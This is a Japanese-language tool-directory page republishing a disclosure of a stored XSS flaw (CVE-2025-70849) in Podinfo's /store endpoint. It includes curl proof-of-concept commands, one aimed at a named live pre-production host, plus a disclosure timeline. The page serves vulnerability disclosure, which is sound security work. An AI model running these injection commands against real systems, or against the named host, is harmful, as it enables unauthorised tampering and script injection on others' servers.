Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-70849 — CVE-2025-70849: PodinfoにおけるStored XSS | Kitploit
ツール/GitHubGitHub/deaprojects/cve-2025-70849
脆弱性分析エクスプロイトウェブセキュリティペネトレーションテスト学習と教育
GitHubdeaprojects/cve-2025-70849

CVE-2025-70849

CVE-2025-70849: PodinfoにおけるStored XSS

リポジトリを見る
13ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-70849: Podinfoにおける格納型XSS

概要

Podinfo(KubernetesマイクロサービスをデモンストレーションするWebアプリケーション)において、セキュリティ脆弱性(CWE-79)が特定されました。/store機能では、認証されていないユーザーが任意のHTML/JSコンテンツをアップロードでき、格納型XSSを引き起こします。

脆弱性詳細

  • CVE ID: CVE-2025-70849
  • 製品: Podinfo
  • 影響を受けるエンドポイント: /store
  • 脆弱性タイプ: 格納型クロスサイトスクリプティング(XSS)
  • 影響を受けるバージョン: <= 6.10.0

概念実証(PoC)

  1. 悪意のあるペイロードを送信する:
    root@kitploit:~
    curl -X POST https://target/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'
    
    ライブターゲットの例:
    root@kitploit:~
    curl -X POST https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'
    
image
  1. 返されたハッシュにアクセスする: https:///store/

    例: https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store/8c1591e1b1e025067a2d73c0853b9a76bd8fc91a

    image

タイムライン

  • 発見: 2025年9月
  • ベンダー通知: 2025年10月25日
  • ベンダーの対応: 承認済み。現時点での修正予定は不明と表明。
  • 公開開示: 2026年2月

免責事項 この研究は教育目的のみです。

謝辞:

Kazi Sabbir |

深刻度: Medium 6.4

ツールをダウンロード